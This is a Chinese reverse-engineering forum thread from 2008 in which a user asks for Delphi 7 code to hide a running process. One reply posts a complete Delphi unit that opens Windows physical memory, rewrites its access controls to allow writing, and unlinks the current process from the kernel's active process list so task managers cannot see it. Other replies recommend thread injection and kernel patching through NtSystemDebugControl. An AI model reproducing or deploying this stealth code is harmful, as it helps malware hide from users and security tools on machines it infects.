首页
社区
课程
招聘
[求助]delphi7隐藏进程
发表于: 2008-6-25 13:50 6418

[求助]delphi7隐藏进程

2008-6-25 13:50
6418
delphi7隐藏进程:
网上代码很多,但好的少...
有没有人能传个好点的代码...要调用dll的也可以
谢谢各位大大了...

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (5)
雪    币: 225
活跃值: (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
2
那就线程插入吧
2008-6-26 09:28
0
雪    币: 269
活跃值: (25)
能力值: ( LV7,RANK:100 )
在线值:
发帖
回帖
粉丝
3
RING0下隐藏亦无藏身之所……况于ring3呼……
2008-6-27 14:14
0
雪    币: 203
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
我也是网上找的 貌似是用APIHook
调用MyHideProcess启用隐藏
试试看能不能满足你的要求

interface

function MyHideProcess: Boolean;

implementation

uses
  Windows, SysUtils, Variants, Classes, AclAPI, accCtrl;

type
  NTSTATUS = LongInt;

const
  STATUS_INFO_LENGTH_MISMATCH = NTSTATUS($C0000004);
  STATUS_ACCESS_DENIED = NTSTATUS($C0000022);
  OBJ_INHERIT = $00000002;
  OBJ_PERMANENT = $00000010;
  OBJ_EXCLUSIVE = $00000020;
  OBJ_CASE_INSENSITIVE = $00000040;
  OBJ_OPENIF = $00000080;
  OBJ_OPENLINK = $00000100;
  OBJ_KERNEL_HANDLE = $00000200;
  OBJ_VALID_ATTRIBUTES = $000003F2;

type
  PIO_STATUS_BLOCK = ^IO_STATUS_BLOCK;
  IO_STATUS_BLOCK = record
    Status: NTSTATUS;
    FObject: DWORD;
  end;

  PUNICODE_STRING = ^UNICODE_STRING;
  UNICODE_STRING = record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  POBJECT_ATTRIBUTES = ^OBJECT_ATTRIBUTES;
  OBJECT_ATTRIBUTES = record
    Length: DWORD;
    RootDirectory: Pointer;
    ObjectName: PUNICODE_STRING;
    Attributes: DWORD;
    SecurityDescriptor: Pointer;
    SecurityQualityOfService: Pointer;
  end;

  TZwOpenSection = function(SectionHandle: PHandle;
    DesiredAccess: ACCESS_MASK;
    ObjectAttributes: POBJECT_ATTRIBUTES): NTSTATUS; stdcall;
  TRTLINITUNICODESTRING = procedure(DestinationString: PUNICODE_STRING;
    SourceString: PWideChar); stdcall;

var
  RtlInitUnicodeString: TRTLINITUNICODESTRING = nil;
  ZwOpenSection: TZwOpenSection = nil;
  g_hNtDLL: THandle = 0;
  g_pMapPhysicalMemory: Pointer = nil;
  g_hMPM: THandle = 0;
  g_hMPM2: THandle = 0;
  g_osvi: OSVERSIONINFO;
  b_hide: Boolean = false;


function InitNTDLL: Boolean;
begin
  g_hNtDLL := LoadLibrary('ntdll.dll');

  if 0 = g_hNtDLL then
  begin
    Result := false;
    Exit;
  end;

  RtlInitUnicodeString := GetProcAddress(g_hNtDLL, 'RtlInitUnicodeString');
  ZwOpenSection := GetProcAddress(g_hNtDLL, 'ZwOpenSection');

  Result := True;
end;


procedure CloseNTDLL;
begin
  if (0 <> g_hNtDLL) then
    FreeLibrary(g_hNtDLL);
  g_hNtDLL := 0;
end;

procedure SetPhyscialMemorySectionCanBeWrited(hSection: THandle);
var
  pDacl: PACL;
  pSD: PPSECURITY_DESCRIPTOR;
  pNewDacl: PACL;
  dwRes: DWORD;
  ea: EXPLICIT_ACCESS;
begin
  pDacl := nil;
  pSD := nil;
  pNewDacl := nil;

  dwRes := GetSecurityInfo(hSection, SE_KERNEL_OBJECT,
    DACL_SECURITY_INFORMATION, nil, nil, pDacl, nil, pSD);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

  ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
  ea.grfAccessPermissions := SECTION_MAP_WRITE;
  ea.grfAccessMode := GRANT_ACCESS;
  ea.grfInheritance := NO_INHERITANCE;
  ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
  ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
  ea.Trustee.ptstrName := 'CURRENT_USER';

  dwRes := SetEntriesInAcl(1, @ea, pDacl, pNewDacl);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

  dwRes := SetSecurityInfo

  (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, nil, nil, pNewDacl,
    nil);

  if ERROR_SUCCESS <> dwRes then
  begin
    if Assigned(pSD) then
      LocalFree(Hlocal(pSD^));
    if Assigned(pNewDacl) then
      LocalFree(HLocal(pNewDacl));
  end;

end;


function OpenPhysicalMemory: THandle;
var
  status: NTSTATUS;
  physmemString: UNICODE_STRING;
  attributes: OBJECT_ATTRIBUTES;
  PhyDirectory: DWORD;
begin
  g_osvi.dwOSVersionInfoSize := sizeof(OSVERSIONINFO);
  GetVersionEx(g_osvi);

  if (5 <> g_osvi.dwMajorVersion) then
  begin
    Result := 0;
    Exit;
  end;

  case g_osvi.dwMinorVersion of
    0: PhyDirectory := $30000;
    1: PhyDirectory := $39000;
  else
    begin
      Result := 0;
      Exit;
    end;
  end;

  RtlInitUnicodeString(@physmemString, '\Device\PhysicalMemory');

  attributes.Length := SizeOf(OBJECT_ATTRIBUTES);
  attributes.RootDirectory := nil;
  attributes.ObjectName := @physmemString;
  attributes.Attributes := 0;
  attributes.SecurityDescriptor := nil;
  attributes.SecurityQualityOfService := nil;

  status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE,
    @attributes);

  if (status = STATUS_ACCESS_DENIED) then
  begin
    ZwOpenSection(@g_hMPM, READ_CONTROL or WRITE_DAC, @attributes);
    SetPhyscialMemorySectionCanBeWrited(g_hMPM);
    CloseHandle(g_hMPM);

    status := ZwOpenSection(@g_hMPM, SECTION_MAP_READ or SECTION_MAP_WRITE,
      @attributes);
  end;

  if not (LongInt(status) >= 0) then
  begin
    Result := 0;
    Exit;
  end;

  g_pMapPhysicalMemory := MapViewOfFile(g_hMPM,
    FILE_MAP_READ or FILE_MAP_WRITE, 0, PhyDirectory, $1000);

  if (g_pMapPhysicalMemory = nil) then
  begin
    Result := 0;
    Exit;
  end;

  Result := g_hMPM;
end;

function LinearToPhys(BaseAddress: PULONG; addr: Pointer): Pointer;
var
  VAddr, PGDE, PTE, PAddr, tmp: DWORD;
begin
  VAddr := DWORD(addr);
  PGDE := PULONG(DWORD(BaseAddress) + (VAddr shr 22) * SizeOf(ULONG))^;

  if 0 = (PGDE and 1) then
  begin
    Result := nil;
    Exit;
  end;

  tmp := PGDE and $00000080;

  if (0 <> tmp) then
  begin
    PAddr := (PGDE and $FFC00000) + (VAddr and $003FFFFF);
  end
  else
  begin
    PGDE := DWORD(MapViewOfFile(g_hMPM, 4, 0, PGDE and $FFFFF000, $1000));
    PTE := PDWORD(PGDE + ((VAddr and $003FF000) shr 12) * SizeOf(DWord))^;
    if (0 = (PTE and 1)) then
    begin
      Result := nil;
      Exit;
    end;

    PAddr := (PTE and $FFFFF000) + (VAddr and $00000FFF);
    UnmapViewOfFile(Pointer(PGDE));
  end;

  Result := Pointer(PAddr);
end;


function GetData(addr: Pointer): DWORD;
var
  phys, ret: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_READ or FILE_MAP_WRITE, 0,
    phys and $FFFFF000, $1000));

  if (nil = tmp) then
  begin
    Result := 0;
    Exit;
  end;

  ret := PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^;
  UnmapViewOfFile(tmp);

  Result := ret;
end;


function SetData(addr: Pointer; data: DWORD): Boolean;
var
  phys: DWORD;
  tmp: PDWORD;
begin
  phys := ULONG(LinearToPhys(g_pMapPhysicalMemory, Pointer(addr)));
  tmp := PDWORD(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $FFFFF000,
    $1000));

  if (nil = tmp) then
  begin
    Result := false;
    Exit;
  end;
  PDWORD(DWORD(tmp) + ((phys and $FFF) shr 2) * SizeOf(DWord))^ := data;
  UnmapViewOfFile(tmp);

  Result := TRUE;
end;

function YHideProcess: Boolean;
var
  thread, process: DWORD;
  fw, bw: DWORD;
begin
  if (FALSE = InitNTDLL) then
  begin
    Result := FALSE;
    Exit;
  end;

  if (0 = OpenPhysicalMemory) then
  begin
    Result := FALSE;
    Exit;
  end;

  thread := GetData(Pointer($FFDFF124));
  process := GetData(Pointer(thread + $44)); 

  if (0 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $A0));
    bw := GetData(Pointer(process + $A4));

    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);

    Result := TRUE;
  end
  else if (1 = g_osvi.dwMinorVersion) then
  begin
    fw := GetData(Pointer(process + $88));
    bw := GetData(Pointer(process + $8C));

    SetData(Pointer(fw + 4), bw);
    SetData(Pointer(bw), fw);

    Result := TRUE;
  end
  else
  begin
    Result := False;
  end;

  CloseHandle(g_hMPM);
  CloseNTDLL;
end;

function MyHideProcess: Boolean;
begin
  if not b_hide then
  begin
    b_hide := YHideProcess;
  end;

  Result := b_hide;
end;

end.

2008-6-28 12:35
0
雪    币: 225
活跃值: (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
5
这个过不了冰刃~~不如线程插入
2008-6-28 12:52
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
很明显是断开活动进程链的代码``````并不是APIHOOK

这个代码在很多机子上运行不了

建议用NtSystemDebugControl来改内核

nt!NtSystemDebugControl:
8060d9b0 6a50            push    50h
8060d9b2 68f8da4d80      push    offset nt!ExpLuidIncrement+0x1c8 (804ddaf8)
8060d9b7 e824a7f2ff      call    nt!_SEH_prolog (805380e0)
8060d9bc 33f6            xor     esi,esi
8060d9be 8975e4          mov     dword ptr [ebp-1Ch],esi
8060d9c1 8975e0          mov     dword ptr [ebp-20h],esi
8060d9c4 8975dc          mov     dword ptr [ebp-24h],esi
8060d9c7 8975d8          mov     dword ptr [ebp-28h],esi
2008-7-14 23:03
0
游客
登录 | 注册 方可回帖
返回
//